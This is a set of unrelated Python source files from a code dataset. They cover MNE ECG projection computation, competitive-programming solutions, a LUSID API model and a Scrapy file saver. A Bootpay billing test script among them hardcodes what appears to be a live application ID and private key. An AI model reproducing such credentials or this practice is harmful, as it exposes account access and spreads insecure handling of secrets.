704d58674aa2460c3770832605de99729383ca7a | 8,399 | py | Python | mne/commands/mne_compute_proj_ecg.py | Anevar/mne-python | 15b19ed6b9364ae4787f0df2fd7e689b3c0a30bb | [
"BSD-3-Clause"
] | 2 | 2015-09-27T20:33:49.000Z | 2020-04-22T19:10:56.000Z | mne/commands/mne_compute_proj_ecg.py | Anevar/mne-python | 15b19ed6b9364ae4787f0df2fd7e689b3c0a30bb | [
"BSD-3-Clause"
] | null | null | null | mne/commands/mne_compute_proj_ecg.py | Anevar/mne-python | 15b19ed6b9364ae4787f0df2fd7e689b3c0a30bb | [
"BSD-3-Clause"
] | 1 | 2018-09-15T09:45:38.000Z | 2018-09-15T09:45:38.000Z | #!/usr/bin/env python
"""Compute SSP/PCA projections for ECG artifacts
You can do for example:
$ mne compute_proj_ecg -i sample_audvis_raw.fif -c "MEG 1531" --l-freq 1 --h-freq 100 --rej-grad 3000 --rej-mag 4000 --rej-eeg 100
"""
from __future__ import print_function
# Authors : Alexandre Gramfort, Ph.D.
# Martin Luessi, Ph.D.
from ..externals.six import string_types
import os
import sys
import mne
if __name__ == '__main__':

    from mne.commands.utils import get_optparser

    parser = get_optparser(__file__)

    # --- command-line options -------------------------------------------
    parser.add_option("-i", "--in", dest="raw_in",
                      help="Input raw FIF file", metavar="FILE")
    parser.add_option("--tmin", dest="tmin", type="float",
                      help="Time before event in seconds",
                      default=-0.2)
    parser.add_option("--tmax", dest="tmax", type="float",
                      help="Time after event in seconds",
                      default=0.4)
    parser.add_option("-g", "--n-grad", dest="n_grad", type="int",
                      help="Number of SSP vectors for gradiometers",
                      default=2)
    parser.add_option("-m", "--n-mag", dest="n_mag", type="int",
                      help="Number of SSP vectors for magnetometers",
                      default=2)
    parser.add_option("-e", "--n-eeg", dest="n_eeg", type="int",
                      help="Number of SSP vectors for EEG",
                      default=2)
    parser.add_option("--l-freq", dest="l_freq", type="float",
                      help="Filter low cut-off frequency in Hz",
                      default=1)
    parser.add_option("--h-freq", dest="h_freq", type="float",
                      help="Filter high cut-off frequency in Hz",
                      default=100)
    parser.add_option("--ecg-l-freq", dest="ecg_l_freq", type="float",
                      help="Filter low cut-off frequency in Hz used "
                      "for ECG event detection",
                      default=5)
    parser.add_option("--ecg-h-freq", dest="ecg_h_freq", type="float",
                      help="Filter high cut-off frequency in Hz used "
                      "for ECG event detection",
                      default=35)
    parser.add_option("-p", "--preload", dest="preload",
                      help="Temporary file used during computation "
                      "(to save memory)",
                      default=True)
    parser.add_option("-a", "--average", dest="average", action="store_true",
                      help="Compute SSP after averaging",
                      default=False)
    parser.add_option("--proj", dest="proj",
                      help="Use SSP projections from a fif file.",
                      default=None)
    parser.add_option("--filtersize", dest="filter_length", type="int",
                      help="Number of taps to use for filtering",
                      default=2048)
    parser.add_option("-j", "--n-jobs", dest="n_jobs", type="int",
                      help="Number of jobs to run in parallel",
                      default=1)
    parser.add_option("-c", "--channel", dest="ch_name",
                      help="Channel to use for ECG detection "
                      "(Required if no ECG found)",
                      default=None)
    parser.add_option("--rej-grad", dest="rej_grad", type="float",
                      help="Gradiometers rejection parameter "
                      "in fT/cm (peak to peak amplitude)",
                      default=2000)
    parser.add_option("--rej-mag", dest="rej_mag", type="float",
                      help="Magnetometers rejection parameter "
                      "in fT (peak to peak amplitude)",
                      default=3000)
    parser.add_option("--rej-eeg", dest="rej_eeg", type="float",
                      help="EEG rejection parameter in uV "
                      "(peak to peak amplitude)",
                      default=50)
    parser.add_option("--rej-eog", dest="rej_eog", type="float",
                      help="EOG rejection parameter in uV "
                      "(peak to peak amplitude)",
                      default=250)
    parser.add_option("--avg-ref", dest="avg_ref", action="store_true",
                      help="Add EEG average reference proj",
                      default=False)
    parser.add_option("--no-proj", dest="no_proj", action="store_true",
                      help="Exclude the SSP projectors currently "
                      "in the fiff file",
                      default=False)
    parser.add_option("--bad", dest="bad_fname",
                      help="Text file containing bad channels list "
                      "(one per line)",
                      default=None)
    parser.add_option("--event-id", dest="event_id", type="int",
                      help="ID to use for events",
                      default=999)
    parser.add_option("--event-raw", dest="raw_event_fname",
                      help="raw file to use for event detection",
                      default=None)
    parser.add_option("--tstart", dest="tstart", type="float",
                      help="Start artifact detection after tstart seconds",
                      default=0.)
    parser.add_option("--qrsthr", dest="qrs_threshold", type="string",
                      help="QRS detection threshold. Between 0 and 1. Can "
                      "also be 'auto' for automatic selection",
                      default='auto')

    options, args = parser.parse_args()

    raw_in = options.raw_in

    # the input file is the only mandatory argument
    if raw_in is None:
        parser.print_help()
        sys.exit(1)

    # --- unpack and validate options ------------------------------------
    tmin = options.tmin
    tmax = options.tmax
    n_grad = options.n_grad
    n_mag = options.n_mag
    n_eeg = options.n_eeg
    l_freq = options.l_freq
    h_freq = options.h_freq
    ecg_l_freq = options.ecg_l_freq
    ecg_h_freq = options.ecg_h_freq
    average = options.average
    preload = options.preload
    filter_length = options.filter_length
    n_jobs = options.n_jobs
    ch_name = options.ch_name
    # rejection thresholds are given on the CLI in fT/cm, fT and uV;
    # convert them to SI units (T/m, T, V) expected by MNE
    reject = dict(grad=1e-13 * float(options.rej_grad),
                  mag=1e-15 * float(options.rej_mag),
                  eeg=1e-6 * float(options.rej_eeg),
                  eog=1e-6 * float(options.rej_eog))
    avg_ref = options.avg_ref
    no_proj = options.no_proj
    bad_fname = options.bad_fname
    event_id = options.event_id
    proj_fname = options.proj
    raw_event_fname = options.raw_event_fname
    tstart = options.tstart
    qrs_threshold = options.qrs_threshold
    if qrs_threshold != 'auto':
        try:
            qrs_threshold = float(qrs_threshold)
        except ValueError:
            raise ValueError('qrsthr must be "auto" or a float')

    if bad_fname is not None:
        # one channel name per line; anything after whitespace is ignored
        bads = [w.rstrip().split()[0] for w in open(bad_fname).readlines()]
        print('Bad channels read : %s' % bads)
    else:
        bads = []

    # derive output filenames from the input file name
    if raw_in.endswith('_raw.fif') or raw_in.endswith('-raw.fif'):
        prefix = raw_in[:-8]
    else:
        prefix = raw_in[:-4]

    ecg_event_fname = prefix + '_ecg-eve.fif'

    if average:
        ecg_proj_fname = prefix + '_ecg_avg_proj.fif'
    else:
        ecg_proj_fname = prefix + '_ecg_proj.fif'

    raw = mne.fiff.Raw(raw_in, preload=preload)

    # ECG events may be detected on a separate raw file if requested
    if raw_event_fname is not None:
        raw_event = mne.fiff.Raw(raw_event_fname)
    else:
        raw_event = raw

    flat = None  # XXX : not exposed to the user
    cpe = mne.preprocessing.compute_proj_ecg
    projs, events = cpe(raw, raw_event, tmin, tmax, n_grad, n_mag, n_eeg,
                        l_freq, h_freq, average, filter_length, n_jobs,
                        ch_name, reject, flat, bads, avg_ref, no_proj,
                        event_id, ecg_l_freq, ecg_h_freq, tstart,
                        qrs_threshold, copy=False)

    raw.close()

    if raw_event_fname is not None:
        raw_event.close()

    if proj_fname is not None:
        print('Including SSP projections from : %s' % proj_fname)
        # append the ecg projs, so they are last in the list
        projs = mne.read_proj(proj_fname) + projs

    # remove the memmap temp file used by --preload, if one was given
    if isinstance(preload, string_types) and os.path.exists(preload):
        os.remove(preload)

    print("Writing ECG projections in %s" % ecg_proj_fname)
    mne.write_proj(ecg_proj_fname, projs)

    print("Writing ECG events in %s" % ecg_event_fname)
    mne.write_events(ecg_event_fname, events)
| 40.379808 | 130 | 0.556971 |
e1fba5d13c536e800e4a197861ca00fae6d88045 | 1,516 | py | Python | 1/kiwi_juice.py | SakiFu/top-coder | 6ee54b6481acf9d2b4dd315cdb1fee30de9a5a4d | [
"MIT"
] | null | null | null | 1/kiwi_juice.py | SakiFu/top-coder | 6ee54b6481acf9d2b4dd315cdb1fee30de9a5a4d | [
"MIT"
] | null | null | null | 1/kiwi_juice.py | SakiFu/top-coder | 6ee54b6481acf9d2b4dd315cdb1fee30de9a5a4d | [
"MIT"
] | null | null | null | import math
"""
Taro has prepared delicious kiwi fruit juice. He poured it into N bottles numbered from 0 to N -1.
The capacity of the i-th bottle is capacities[i] liters, and he poured juice[i] liters of kiwi juice into this bottle.
Now he wants to redistribute juice in the bottles.
In order to do this, he will perform M operations numbered from 0 to M-1 in the order in which he will perform them.
For the i-th operation, he will pour kiwi juice from bottle from_id[i] to bottle to_id[i].
He will stop pouring when bottle from_id[i] becomes empty or bottle to_id[i] becomes full, whichever happens earlier.
Return an int[] that contains exactly N elements and whose i-th element is the amount of kiwi juice in the i-th bottle
after all pouring operations are finished.
Example:
capacities = [20, 20]
juice = [5,8]
from_id = [0]
to_id = [1]
Output : [0,13]
"""
def kiwi_juice1(capacities, juice, from_id, to_id):
    """Simulate each pour operation in order and return the final amounts.

    Mutates ``juice`` in place (and also returns it), matching the original
    behaviour: each pour stops when the source empties or the destination
    fills, whichever comes first.
    """
    for src, dst in zip(from_id, to_id):
        free = capacities[dst] - juice[dst]
        if free >= juice[src]:
            # The destination can absorb everything the source holds.
            moved = juice[src]
        else:
            # The destination fills up first.
            moved = free
        juice[dst] += moved
        juice[src] -= moved
    return juice
def kiwi_juice2(capacities, juice, from_id, to_id):
    """Same simulation as kiwi_juice1, expressed with a single min().

    The amount poured is the smaller of what the source holds and the free
    space in the destination.  ``juice`` is mutated in place and returned.
    """
    for step, src in enumerate(from_id):
        dst = to_id[step]
        moved = min(juice[src], capacities[dst] - juice[dst])
        juice[src] -= moved
        juice[dst] += moved
    return juice
8d64be0e1beb46125a75be4ad90865f8c4981b2d | 563 | py | Python | Solutions/16/Printer.py | hosseindehghanipour1998/Python-Training | 8825f43c9b843d927453b555b84674f609501264 | [
"MIT"
] | 1 | 2019-11-03T15:12:28.000Z | 2019-11-03T15:12:28.000Z | Solutions/16/Printer.py | hosseindehghanipour1998/python2-sample-questions | 8825f43c9b843d927453b555b84674f609501264 | [
"MIT"
] | null | null | null | Solutions/16/Printer.py | hosseindehghanipour1998/python2-sample-questions | 8825f43c9b843d927453b555b84674f609501264 | [
"MIT"
] | null | null | null | #Q2-a
def a(x):
i = 1
while i<x:
print i,
i+=1
while x>0:
print x,
x-=1
#-----------------------------------
#Q2-b
# Python 2: prints x spaces on the current line; used by c() as left padding.
def b(x):
	print x*" ",
	'''
	or we can use this one:
	def b(x):
	while i<x:
		print " ",
	'''
#-----------------------------------
#Q2-c
# Python 2: prints a number diamond of height 2*x - 1.  Each row is padded
# with b() and filled with the "1..n..1" pattern from a(); the bare `print`
# ends the row.
def c(x):
	line = 1
	while line<=x:
		b(x - line)
		a(line)
		print
		line+=1
	line-=2
	while line>0:
		b(x-line)
		a(line)
		print
		line-=1
'''
c(8)
'''
| 13.093023 | 36 | 0.301954 |
1f013aad029a9dff945e7367ae51240bcca2dcc6 | 4,887 | py | Python | Round F/festival2.py | romilxz/GoogleKickStart-2021 | 383f28ee7c6041e176db5f8388eed1564c5c4347 | [
"MIT"
] | 76 | 2021-03-21T14:13:32.000Z | 2022-03-20T03:30:06.000Z | Round F/festival2.py | romilxz/GoogleKickStart-2021 | 383f28ee7c6041e176db5f8388eed1564c5c4347 | [
"MIT"
] | 3 | 2021-05-10T13:40:21.000Z | 2021-12-19T17:33:12.000Z | Round F/festival2.py | romilxz/GoogleKickStart-2021 | 383f28ee7c6041e176db5f8388eed1564c5c4347 | [
"MIT"
] | 32 | 2021-03-21T15:07:05.000Z | 2022-03-18T21:53:34.000Z | # Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Kick Start 2021 Round F - Problem B. Festival
# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000435bae/0000000000887dba
#
# Time: O(NlogN), pass in PyPy2 but Python2
# Space: O(N)
#
from random import randint, seed
# Template:
# https://github.com/kamyu104/GoogleKickStart-2021/blob/master/Round%20D/final_exam.py
class SkipNode(object):
    """A single skip-list node: a value plus per-level forward/back links."""
    def __init__(self, level=0, val=None):
        self.val = val
        # One forward and one backward link slot per level the node spans.
        self.nexts = [None for _ in range(level)]
        self.prevs = [None for _ in range(level)]
class SkipList(object):
    """Randomized skip list with doubly linked levels and a tail sentinel.

    Expected O(log n) insert/find/remove.  A sentinel node holding ``end``
    (default +inf) is added on construction, so the list is never empty and
    ``end()`` always marks one-past-the-last real element.  Python 2 code
    (uses ``xrange``).
    """
    P_NUMERATOR, P_DENOMINATOR = 1, 2 # P = 1/4 in redis implementation
    MAX_LEVEL = 32 # enough for 2^32 elements
    def __init__(self, end=float("inf"), can_duplicated=True):
        # Fixed seed makes the random level choices deterministic.
        seed(0)
        self.__head = SkipNode()
        self.__len = 0
        self.__can_duplicated = can_duplicated
        self.add(end)
        self.__end = self.find(end)
    def begin(self):
        # First real node: the head sentinel's level-0 successor.
        return self.__head.nexts[0]
    def end(self):
        # Tail sentinel holding the ``end`` value.
        return self.__end
    def lower_bound(self, target, cmp=lambda x, y: x < y):
        # First node whose value is not "less than" target under ``cmp``.
        return self.__lower_bound(self.__find_prev_nodes(target, cmp))
    def find(self, target):
        # Node holding exactly ``target``, or None if absent.
        return self.__find(target, self.__find_prev_nodes(target))
    def add(self, val):
        # In no-duplicates mode return (existing_node, False) instead of
        # inserting a second copy.
        if not self.__can_duplicated and self.find(val):
            return self.find(val), False
        node = SkipNode(self.__random_level(), val)
        # Grow the head's level list if this node is taller than any so far.
        if len(self.__head.nexts) < len(node.nexts):
            self.__head.nexts.extend([None]*(len(node.nexts)-len(self.__head.nexts)))
        prevs = self.__find_prev_nodes(val)
        # Splice the node in at every level it participates in, keeping both
        # forward and backward links consistent.
        for i in xrange(len(node.nexts)):
            node.nexts[i] = prevs[i].nexts[i]
            if prevs[i].nexts[i]:
                prevs[i].nexts[i].prevs[i] = node
            prevs[i].nexts[i] = node
            node.prevs[i] = prevs[i]
        self.__len += 1
        return node if self.__can_duplicated else (node, True)
    def remove(self, it):
        # Unlink the node referenced by ``it``; returns the node that
        # followed it (or the end sentinel when nothing was removed).
        prevs = it.prevs
        curr = self.__find(it.val, prevs)
        if not curr:
            return self.__end
        self.__len -= 1
        for i in reversed(xrange(len(curr.nexts))):
            prevs[i].nexts[i] = curr.nexts[i]
            if curr.nexts[i]:
                curr.nexts[i].prevs[i] = prevs[i]
            # Drop the head's top level if it just became empty.
            if not self.__head.nexts[i]:
                self.__head.nexts.pop()
        return curr.nexts[0]
    def __lower_bound(self, prevs):
        if prevs:
            candidate = prevs[0].nexts[0]
            if candidate:
                return candidate
        return None
    def __find(self, val, prevs):
        candidate = self.__lower_bound(prevs)
        if candidate and candidate.val == val:
            return candidate
        return None
    def __find_prev_nodes(self, val, cmp=lambda x, y: x < y):
        # For each level, the last node strictly "less than" ``val``.
        prevs = [None]*len(self.__head.nexts)
        curr = self.__head
        for i in reversed(xrange(len(self.__head.nexts))):
            while curr.nexts[i] and cmp(curr.nexts[i].val, val):
                curr = curr.nexts[i]
            prevs[i] = curr
        return prevs
    def __random_level(self):
        # Geometric distribution: keep promoting with probability
        # P_NUMERATOR/P_DENOMINATOR per level, capped at MAX_LEVEL.
        level = 1
        while randint(1, SkipList.P_DENOMINATOR) <= SkipList.P_NUMERATOR and \
              level < SkipList.MAX_LEVEL:
            level += 1
        return level
    def __iter__(self):
        # Yield stored values in ascending order, excluding the sentinel.
        it = self.begin()
        while it != self.end():
            yield it.val
            it = it.nexts[0]
    def __len__(self):
        return self.__len-1 # excluding end node
    def __str__(self):
        # One line per level, top level first, values joined with "->".
        result = []
        for i in reversed(xrange(len(self.__head.nexts))):
            result.append([])
            curr = self.__head.nexts[i]
            while curr:
                result[-1].append(str(curr.val))
                curr = curr.nexts[i]
        return "\n".join(map(lambda x: "->".join(x), result))
def festival():
    """Solve one test case: maximum sum of the K happiest concurrent attractions.

    Sweeps attraction start/end events in time order while maintaining a
    skip list of negated happiness values.  ``curr`` is the running sum of
    the current top-K window and ``it`` points at the node bounding that
    window (the least-happy attraction currently counted).  Python 2 code
    (``raw_input``/``xrange``).
    """
    D, N, K = map(int, raw_input().strip().split())
    points = []
    for _ in xrange(N):
        h, s, e = map(int, raw_input().strip().split())
        # +1 event on the start day; -1 event the day after the end day.
        points.append((s, 1, h))
        points.append((e+1, -1, h))
    points.sort()
    sl, it = SkipList(), None
    result = curr = 0
    for _, c, h in points:
        if c == 1:
            # Attraction becomes active: store -h so the list is ascending
            # with the happiest attraction first.
            sl.add(-h)
            if len(sl) <= K:
                curr += h
                it = sl.end().prevs[0]
            elif h >= -it.val:
                # New attraction displaces the current window boundary.
                curr -= -it.val
                curr += h
                it = it.prevs[0]
            result = max(result, curr)
        else:
            # Attraction ends: drop it; if it was inside the top-K window,
            # pull the next-best attraction into the window.
            sl.remove(sl.find(-h))
            if len(sl) < K:
                curr -= h
                it = sl.end().prevs[0]
            elif h >= -it.val:
                curr -= h
                curr += -it.nexts[0].val
                it = it.nexts[0]
    return result
# Read the number of test cases, then print each answer in the standard
# Kick Start "Case #i: answer" format (Python 2 print statement).
for case in xrange(input()):
    print 'Case #%d: %s' % (case+1, festival())
| 31.127389 | 93 | 0.54246 |
2996cd8f55fb01337ae1b28b08405a27b690ff98 | 785 | py | Python | test/request_subscribe_rest.py | bootpay/server_python | fd288e0f85e272587a564da2bdd1a1ef3a49380d | [
"MIT"
] | 2 | 2018-12-20T07:52:39.000Z | 2019-11-17T16:07:39.000Z | test/request_subscribe_rest.py | bootpay/server_python | fd288e0f85e272587a564da2bdd1a1ef3a49380d | [
"MIT"
] | null | null | null | test/request_subscribe_rest.py | bootpay/server_python | fd288e0f85e272587a564da2bdd1a1ef3a49380d | [
"MIT"
] | 5 | 2018-12-31T00:42:05.000Z | 2022-03-23T10:05:52.000Z | import sys
import os
import time
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.BootpayApi import BootpayApi
bootpay = BootpayApi('5b8f6a4d396fa665fdc2b5ea', 'rm6EYECr6aroQVG2ntW0A6LpWnkTgP4uQ3H18sDDUYw=')
result = bootpay.get_access_token()
if result['status'] is 200:
response = bootpay.get_subscribe_billing_key(
'nicepay',
str(time.time()),
'30일 결제권',
'[ 카드 번호 ]',
'[ 카드 비밀번호 앞자리 2개 ]',
'[ 카드 만료 연도 2자리 ]',
'[ 카드 만료 월 2자리 ]',
'[ 카드 소유주 생년월일 혹은 사업자 등록번호 ]',
None,
{
'subscribe_test_payment': 1
}
)
print(response)
# Billing key를 취소할 때 쓰는 API
print(
bootpay.destroy_subscribe_billing_key(result['data']['billing_key'])
)
| 23.787879 | 96 | 0.601274 |
c8b336e342865a7ab2e4f501cadfad78e74c2313 | 8,559 | py | Python | sdk/lusid/models/paged_resource_list_of_property_definition_search_result.py | finbourne/lusid-sdk-python-generated-preview | 9c36c953e8149443a4390ed7f0c04d01211401b6 | [
"MIT"
] | null | null | null | sdk/lusid/models/paged_resource_list_of_property_definition_search_result.py | finbourne/lusid-sdk-python-generated-preview | 9c36c953e8149443a4390ed7f0c04d01211401b6 | [
"MIT"
] | null | null | null | sdk/lusid/models/paged_resource_list_of_property_definition_search_result.py | finbourne/lusid-sdk-python-generated-preview | 9c36c953e8149443a4390ed7f0c04d01211401b6 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.4425
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class PagedResourceListOfPropertyDefinitionSearchResult(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
      required_map (dict): The key is attribute name
                           and the value is whether it is 'required' or 'optional'.
    """
    # Attribute name -> declared OpenAPI type (consumed by to_dict()).
    openapi_types = {
        'next_page': 'str',
        'previous_page': 'str',
        'values': 'list[PropertyDefinitionSearchResult]',
        'href': 'str',
        'links': 'list[Link]'
    }
    # Attribute name -> JSON key used on the wire.
    attribute_map = {
        'next_page': 'nextPage',
        'previous_page': 'previousPage',
        'values': 'values',
        'href': 'href',
        'links': 'links'
    }
    # Attribute name -> whether the OpenAPI schema marks it required.
    required_map = {
        'next_page': 'optional',
        'previous_page': 'optional',
        'values': 'required',
        'href': 'optional',
        'links': 'optional'
    }
    def __init__(self, next_page=None, previous_page=None, values=None, href=None, links=None, local_vars_configuration=None):  # noqa: E501
        """PagedResourceListOfPropertyDefinitionSearchResult - a model defined in OpenAPI"
        :param next_page:  The next page of results.
        :type next_page: str
        :param previous_page:  The previous page of results.
        :type previous_page: str
        :param values:  The resources to list. (required)
        :type values: list[lusid.PropertyDefinitionSearchResult]
        :param href:  The URI of the resource list.
        :type href: str
        :param links:  Collection of links.
        :type links: list[lusid.Link]
        """  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration.get_default_copy()
        self.local_vars_configuration = local_vars_configuration
        self._next_page = None
        self._previous_page = None
        self._values = None
        self._href = None
        self._links = None
        self.discriminator = None
        # Assign through the property setters so client-side validation runs.
        self.next_page = next_page
        self.previous_page = previous_page
        self.values = values
        self.href = href
        self.links = links
    @property
    def next_page(self):
        """Gets the next_page of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        The next page of results.  # noqa: E501
        :return: The next_page of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :rtype: str
        """
        return self._next_page
    @next_page.setter
    def next_page(self, next_page):
        """Sets the next_page of this PagedResourceListOfPropertyDefinitionSearchResult.
        The next page of results.  # noqa: E501
        :param next_page: The next_page of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :type next_page: str
        """
        self._next_page = next_page
    @property
    def previous_page(self):
        """Gets the previous_page of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        The previous page of results.  # noqa: E501
        :return: The previous_page of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :rtype: str
        """
        return self._previous_page
    @previous_page.setter
    def previous_page(self, previous_page):
        """Sets the previous_page of this PagedResourceListOfPropertyDefinitionSearchResult.
        The previous page of results.  # noqa: E501
        :param previous_page: The previous_page of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :type previous_page: str
        """
        self._previous_page = previous_page
    @property
    def values(self):
        """Gets the values of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        The resources to list.  # noqa: E501
        :return: The values of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :rtype: list[lusid.PropertyDefinitionSearchResult]
        """
        return self._values
    @values.setter
    def values(self, values):
        """Sets the values of this PagedResourceListOfPropertyDefinitionSearchResult.
        The resources to list.  # noqa: E501
        :param values: The values of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :type values: list[lusid.PropertyDefinitionSearchResult]
        """
        # ``values`` is the only required field; reject None when client-side
        # validation is enabled.
        if self.local_vars_configuration.client_side_validation and values is None:  # noqa: E501
            raise ValueError("Invalid value for `values`, must not be `None`")  # noqa: E501
        self._values = values
    @property
    def href(self):
        """Gets the href of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        The URI of the resource list.  # noqa: E501
        :return: The href of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :rtype: str
        """
        return self._href
    @href.setter
    def href(self, href):
        """Sets the href of this PagedResourceListOfPropertyDefinitionSearchResult.
        The URI of the resource list.  # noqa: E501
        :param href: The href of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :type href: str
        """
        self._href = href
    @property
    def links(self):
        """Gets the links of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        Collection of links.  # noqa: E501
        :return: The links of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :rtype: list[lusid.Link]
        """
        return self._links
    @links.setter
    def links(self, links):
        """Sets the links of this PagedResourceListOfPropertyDefinitionSearchResult.
        Collection of links.  # noqa: E501
        :param links: The links of this PagedResourceListOfPropertyDefinitionSearchResult.  # noqa: E501
        :type links: list[lusid.Link]
        """
        self._links = links
    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models; when ``serialize`` is True the
        # wire (camelCase) attribute names from attribute_map are used.
        def convert(x):
            if hasattr(x, "to_dict"):
                args = getfullargspec(x.to_dict).args
                if len(args) == 1:
                    return x.to_dict()
                else:
                    return x.to_dict(serialize)
            else:
                return x
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            attr = self.attribute_map.get(attr, attr) if serialize else attr
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: convert(x),
                    value
                ))
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], convert(item[1])),
                    value.items()
                ))
            else:
                result[attr] = convert(value)
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, PagedResourceListOfPropertyDefinitionSearchResult):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, PagedResourceListOfPropertyDefinitionSearchResult):
            return True
        return self.to_dict() != other.to_dict()
9b661acb15724c1bd487d54e97db991ff3c3e20d | 3,797 | py | Python | src/python/src/utils/file_saver.py | halimov-oa/scrapy-boilerplate | fe3c552fed26bedb0618c245ab923aa34a89ac9d | [
"MIT"
] | null | null | null | src/python/src/utils/file_saver.py | halimov-oa/scrapy-boilerplate | fe3c552fed26bedb0618c245ab923aa34a89ac9d | [
"MIT"
] | null | null | null | src/python/src/utils/file_saver.py | halimov-oa/scrapy-boilerplate | fe3c552fed26bedb0618c245ab923aa34a89ac9d | [
"MIT"
] | null | null | null | import cgi
import mimetypes
import os
import pathlib
import re
from html import unescape
from typing import Optional, Tuple
from uuid import uuid4
from urllib.parse import unquote
from furl import furl
from scrapy.http import Response
class FileSaver:
    """Persists downloaded response bodies into size-capped "bucket" folders.

    Files are written under ``base_folder`` into sub-folders named
    ``<bucket_prefix><N>``; once a bucket holds ``max_bucket_size`` files a
    new bucket ``<bucket_prefix><N+1>`` is started.  On construction the
    saver resumes from the highest-numbered existing bucket.
    """
    folder_size: int
    folder_number: int
    select_folder: str
    def __init__(self, base_folder: str, bucket_prefix: str, max_bucket_size: int):
        self.base_folder: str = os.path.abspath(base_folder)
        self.bucket_prefix: str = bucket_prefix
        self.max_bucket_size: int = max_bucket_size  # maximum number of files per bucket
        os.makedirs(self.base_folder, exist_ok=True)
        # Find the highest-numbered existing bucket folder, if any.
        numbered = [
            (entry.name, int(entry.name.replace(self.bucket_prefix, '')))
            for entry in os.scandir(self.base_folder)
            if entry.is_dir() and self.bucket_prefix in entry.name
        ]
        if numbered:
            folder_name, self.folder_number = max(numbered, key=lambda item: item[1])
        else:
            self.folder_number = 1
            folder_name = ''.join([self.bucket_prefix, '1'])
        self.select_folder = os.path.join(self.base_folder, folder_name)
        if os.path.exists(self.select_folder):
            # Resume: count the files already present in the bucket.
            self.folder_size = len(next(os.walk(self.select_folder))[2])
        else:
            os.mkdir(self.select_folder)
            self.folder_size = 0
        if self._is_folder_full():
            self._change_folder()
    def _increment_folder_size(self) -> None:
        """Record that one more file was written into the current bucket."""
        self.folder_size += 1
    def _change_folder(self) -> None:
        """Advance to the next bucket folder, creating it if needed."""
        self.folder_number += 1
        self.select_folder = os.path.join(
            self.base_folder,
            ''.join([self.bucket_prefix, str(self.folder_number)])
        )
        self.folder_size = 0
        os.makedirs(self.select_folder, exist_ok=True)
    def _is_folder_full(self) -> bool:
        """True when the current bucket has reached max_bucket_size files."""
        return self.folder_size >= self.max_bucket_size
    def save_file(
        self,
        response: "Response",
        filename_prefix: str = '',
        filename: Optional[str] = None
    ) -> Tuple[str, str]:
        """Write ``response.body`` into the current bucket.

        Returns ``(path_to_file, original_filename)``, where
        ``original_filename`` is derived from the response headers.
        Raises Exception for unsupported content types.
        """
        if 'Content-Type' in response.headers:
            content_type: str = response.headers['Content-Type'].decode()
            if content_type.startswith(('image/', 'audio/', 'application/pdf')):
                raw_filename: str = furl(response.url).path.segments[-1]
                # Strip any query/fragment residue plus the URL's extension,
                # then append an extension guessed from the MIME type.
                # guess_extension() can return None; fall back to no suffix.
                mime_type = content_type.split(';')[0].strip()
                extension = mimetypes.guess_extension(mime_type) or ''
                raw_filename = re.search('^[^?;#.]*', raw_filename).group() + extension
            else:
                raise Exception('Unsupported content type')
        elif 'Content-Disposition' in response.headers:
            # NOTE: cgi is deprecated (removed in Python 3.13); migrate to
            # email.message or a dedicated parser when upgrading.
            _, params = cgi.parse_header(response.headers['Content-Disposition'].decode())
            if 'filename*' in params:
                # RFC 5987 extended value: "<charset>'<lang>'<pct-encoded>".
                raw_filename: str = unquote(unescape(params['filename*']))
                # BUG FIX: the original used str.lstrip("utf-8''"), which
                # strips a *character set* and could eat leading letters of
                # the real name; remove the literal prefix instead.
                if raw_filename.lower().startswith("utf-8''"):
                    raw_filename = raw_filename[len("utf-8''"):]
            else:
                raw_filename: str = unescape(params['filename'])
        else:
            raise Exception('Unsupported file type')
        original_filename = re.sub('[~/]', '_', raw_filename)
        file_type = pathlib.Path(original_filename).suffix
        if not filename:
            filename: str = str(uuid4().hex)
        filename = filename_prefix + filename
        # BUG FIX: the original ignored ``filename`` and wrote every file as
        # "(unknown).<ext>", so files in a bucket overwrote each other.
        path_to_file: str = os.path.join(self.select_folder, f'{filename}{file_type}')
        with open(path_to_file, 'wb') as writer:
            writer.write(response.body)
        self._increment_folder_size()
        if self._is_folder_full():
            self._change_folder()
        return path_to_file, original_filename
